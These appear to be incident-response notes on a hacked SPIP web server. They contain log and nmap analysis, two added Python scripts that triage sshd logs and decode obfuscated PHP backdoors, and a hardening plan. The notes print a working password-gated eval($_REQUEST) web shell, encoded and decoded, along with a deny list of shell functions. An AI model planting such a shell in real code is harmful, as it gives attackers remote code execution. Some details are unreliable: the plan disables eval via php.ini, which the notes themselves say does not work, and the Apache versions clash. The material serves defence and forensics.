Search procedure
- Log analysis (/var/log)
- Identification of a backdoor (compat.php)
- Code analysis
- Authenticated access protected by an MD5-hashed password
- The backdoor code was wrapped in gzinflate(base64_decode(*)) inside the "compat.php" file
- Backdoor analysis (decoding with http://www.decoder-online.com)
- MD5 password : ff6cb56b876eedf90b5bca2c0a210f91
- Nmap analysis from outside :
Not shown: 999 open|filtered ports, 997 filtered ports
PORT     STATE  SERVICE    VERSION
21/tcp   open   ftp        ProFTPD 1.3.2
80/tcp   open   http       Apache httpd 2.2.8 ((Unix) PHP/5.2.5)
|_http-favicon: Unknown favicon MD5: 3AD8FECBDE088AF038C26EE5A5F40D5B
| http-methods: GET HEAD POST OPTIONS TRACE
| Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Site doesn't have a title (text/html).
8080/tcp closed http-proxy
4672/udp closed rfa
SSH log analysis (/var/log/secure)
Geolocation of the source IPs with: http://www.iplocation.net/index.php
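The log triage above boils down to two questions: which sources were hammering sshd, and did any of them eventually get in. The following script is an added example for these notes, not a tool from the original page; it parses sshd entries in the /var/log/secure format, counts failures per source IP and flags accepted logins from sources that had been failing just before. The log lines are constructed (RFC 5737 documentation addresses), not taken from the compromised server.

```python
"""Triage sshd entries from /var/log/secure: failed logins per source IP and
accepted logins that came from a source that was brute-forcing.
Added example, not part of the original notes; the log lines are constructed."""
import re
from collections import Counter, defaultdict

# Constructed sample in the rsyslog format used by /var/log/secure on RHEL/CentOS.
SAMPLE_LOG = """\
Jul 12 03:14:01 web01 sshd[2201]: Failed password for invalid user admin from 203.0.113.45 port 51122 ssh2
Jul 12 03:14:03 web01 sshd[2201]: Failed password for invalid user admin from 203.0.113.45 port 51123 ssh2
Jul 12 03:14:05 web01 sshd[2203]: Failed password for root from 203.0.113.45 port 51130 ssh2
Jul 12 03:14:09 web01 sshd[2205]: Accepted password for root from 203.0.113.45 port 51140 ssh2
Jul 12 08:02:11 web01 sshd[2301]: Accepted publickey for deploy from 198.51.100.7 port 40022 ssh2
Jul 12 09:30:00 web01 sshd[2400]: Failed password for www from 192.0.2.9 port 33000 ssh2
"""

FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port")
ACCEPTED_RE = re.compile(
    r"sshd\[\d+\]: Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<ip>\S+) port")


def parse_secure_log(text):
    """Return (failed_per_ip, failed_users_per_ip, accepted_logins)."""
    failed = Counter()
    failed_users = defaultdict(set)
    accepted = []  # (ip, user, method) in log order
    for line in text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            failed[m["ip"]] += 1
            failed_users[m["ip"]].add(m["user"])
            continue
        m = ACCEPTED_RE.search(line)
        if m:
            accepted.append((m["ip"], m["user"], m["method"]))
    return failed, failed_users, accepted


def suspicious_logins(text, threshold=3):
    """Accepted logins from an IP that had at least `threshold` failures earlier
    in the log: a password guess that finally succeeded looks exactly like this."""
    failed_so_far = Counter()
    flagged = []  # (ip, user, failures_before_success)
    for line in text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            failed_so_far[m["ip"]] += 1
            continue
        m = ACCEPTED_RE.search(line)
        if m and failed_so_far[m["ip"]] >= threshold:
            flagged.append((m["ip"], m["user"], failed_so_far[m["ip"]]))
    return flagged


def top_sources(text, n=5):
    """Source IPs ordered by failed-login count; these are the addresses to
    look up in a geolocation service and to consider blocking."""
    failed, _, _ = parse_secure_log(text)
    return failed.most_common(n)


if __name__ == "__main__":
    for ip, user, n in suspicious_logins(SAMPLE_LOG):
        print(f"accepted login for {user} from {ip} after {n} failures")
    for ip, n in top_sources(SAMPLE_LOG):
        print(f"{ip}: {n} failed attempts")
```

On a real host, read /var/log/secure (and its rotated copies) into `text`; the `suspicious_logins` hit for root from 203.0.113.45 is the kind of entry that justifies both the IP block and the password-policy items in the action plan below.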
The backdoor
It gave total access to the server: a list of known exploits, system access and the list of PHP functions disabled on the host. So we could say our hacker was rather nice; he could have done a lot more damage if he had wanted to... much more than defacing our website with "viagra" ads.
Inside /var/www :
grep -R -e 'gzinflate(base64' .    # the PHP function is gzinflate(), not gzipinflate()
This command found 6 files that had been compromised with a copy of the backdoor.
System side
Very old OS version with no updates at all
Very old version of the Apache web server: 2.0.52 (24 May 2006)
Application side
Old version of SPIP; I think the hacker used a common SPIP exploit to compromise the server.
Some basic tasks to detect common things
Use rootkit detection software such as chkrootkit
Web Shell Detector ( https://github.com/emposha/PHP-Shell-Detector)
- Several malicious code discovered
- Base64-encoded code:
eval(base64_decode('aWYoaXNzZXQoJF9SRVFVRVNUWydjaCddKSAmJiAobWQ1KCRfUkVRVUVTVFsnY2gnXSkgPT0gJzc0MjUzYjUxNjIzNmI1ZmZiZTM1NzFlM2I5MTNiMzZhJykgJiYgaXNzZXQoJF9SRVFVRVNUWydwaHBfY29kZSddKSkgeyBldmFsKCRfUkVRVUVTVFsncGhwX2NvZGUnXSk7IGV4aXQoKTsgfQ=='));
Which decodes to:
if(isset($_REQUEST['ch']) && (md5($_REQUEST['ch']) == '74253b516236b5ffbe3571e3b913b36a') && isset($_REQUEST['php_code'])) { eval($_REQUEST['php_code']); exit(); }
Useful background on this type of code:
http://aw-snap.info/articles/backdoor-examples.php
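Both backdoors in these notes have the same shape: a wrapper (eval or gzinflate) around base64_decode of a string literal, sometimes nested. The following scanner is an added example, not the site's code or a tool from the original notes; it does the grep step from the /var/www search above in a form that also decodes the payload, peels nested layers, and lists the calls found in the clear text. eval is reported by name because it is a language construct, not a function, so the disable_functions setting in php.ini cannot switch it off; it has to be found in the source. The samples are constructed: the first reuses the base64 string quoted above, the second packs it a second time with raw deflate, the way the compat.php copy was wrapped. The file list (`PHP_EXT`) and the function names are assumptions.

```python
"""Find and decode obfuscated PHP backdoors of the form eval(base64_decode('...'))
or gzinflate(base64_decode('...')) under a web root.
Added example, not code from the compromised site; samples are constructed."""
import base64
import os
import re
import zlib

# eval( or gzinflate( wrapping base64_decode( of a quoted literal.
OBFUSCATED_RE = re.compile(
    r"(eval|gzinflate)\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)",
    re.IGNORECASE)
# Calls worth reporting once the payload is decoded (assumed list).
DANGEROUS_RE = re.compile(
    r"\b(eval|system|exec|passthru|shell_exec|popen|proc_open|assert)\s*\(", re.IGNORECASE)
PHP_EXT = (".php", ".phtml", ".inc", ".php5")  # assumed set of PHP extensions


def decode_payload(b64, wrapper):
    """Undo one base64 layer; PHP's gzinflate() is raw deflate (zlib wbits=-15)."""
    raw = base64.b64decode(re.sub(r"\s", "", b64))
    if wrapper.lower() == "gzinflate":
        raw = zlib.decompress(raw, -15)
    return raw.decode("utf-8", errors="replace")


def unwrap(payload, max_depth=5):
    """Peel nested layers: the decoded text often contains another wrapper."""
    for _ in range(max_depth):
        m = OBFUSCATED_RE.search(payload)
        if not m:
            break
        payload = decode_payload(m.group(2), m.group(1))
    return payload


def scan_source(src):
    """One finding per wrapper occurrence in a PHP source string."""
    findings = []
    for m in OBFUSCATED_RE.finditer(src):
        decoded = unwrap(decode_payload(m.group(2), m.group(1)))
        findings.append({
            "wrapper": m.group(1).lower(),
            "decoded": decoded,
            "dangerous": sorted({f.lower() for f in DANGEROUS_RE.findall(decoded)}),
        })
    return findings


def scan_tree(root):
    """Walk a web root such as /var/www and map file path -> findings."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_EXT):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = scan_source(fh.read())
            except OSError:
                continue
            if found:
                hits[path] = found
    return hits


def deflate_b64(text):
    """Pack text as raw deflate + base64, i.e. what gzinflate(base64_decode()) undoes."""
    c = zlib.compressobj(level=9, wbits=-15)
    return base64.b64encode(c.compress(text.encode()) + c.flush()).decode()


# Constructed samples. INNER is the eval(base64_decode()) line quoted in the notes.
INNER = ("eval(base64_decode('aWYoaXNzZXQoJF9SRVFVRVNUWydjaCddKSAmJiAobWQ1KCRfUkVRVUVTVFsnY2gnXSkg"
         "PT0gJzc0MjUzYjUxNjIzNmI1ZmZiZTM1NzFlM2I5MTNiMzZhJykgJiYgaXNzZXQoJF9SRVFVRVNUWydwaHBfY29k"
         "ZSddKSkgeyBldmFsKCRfUkVRVUVTVFsncGhwX2NvZGUnXSk7IGV4aXQoKTsgfQ=='));")
SAMPLE_EVAL = "<?php " + INNER + " ?>"
# Second layer, like the compat.php copy: gzinflate around the eval(base64_decode()) line.
SAMPLE_GZ = "<?php eval(gzinflate(base64_decode('" + deflate_b64(INNER) + "'))); ?>"

if __name__ == "__main__":
    for sample in (SAMPLE_EVAL, SAMPLE_GZ):
        for f in scan_source(sample):
            print(f["wrapper"], f["dangerous"], f["decoded"][:60] + "...")
```

`scan_tree("/var/www")` gives the same file list as the grep, plus the decoded text per file, which is what you need to decide whether a hit is a packed legitimate library or a shell with a hard-coded MD5 check like the one above.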
Emergency action plan
- Block FTP access and only let ports 80 and 443 through to the final web server
- Block IP from suspicious places
- Do a grep search (base64_decode and gzinflate) over the whole filesystem of the server and remove dangerous scripts and code
- Then reinstall the server (the only way to be sure everything is clean again)
- With a recent version of apache (with automatic updates)
- With a recent kernel
- If really necessary: FTPS (or SFTP) access, chrooted, with a strong password policy
- With automatic backup of the DocumentRoot to svn (easier to see differences if necessary)
- Remove "dangerous" system tools (with yum remove, or rm for make):
  - gcc, make, nc
- Disable PHP functions like "eval" inside php.ini:
- disable_functions=exec,eval,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source
New architecture
- Reverse proxy installation with Apache or Nginx in DMZ
- Final Apache server with mod_security and/or mod_evasive
- FTP access inside a reverse proxy with Pydio (formerly ajaxplorer) under SSL
Linux Malware Detect
chmod +x install.php
./install.php
maldet -u                          # update the signature set
maldet -p                          # purge old logs, quarantine queue and session data
maldet -a /var/www/                # scan the whole web root
maldet --report                    # view the scan report
maldet --clean 100713-1111.16205   # clean the files reported by scan 100713-1111.16205
Schedule maldet with cron and send an e-mail whenever a rootkit or web shell is detected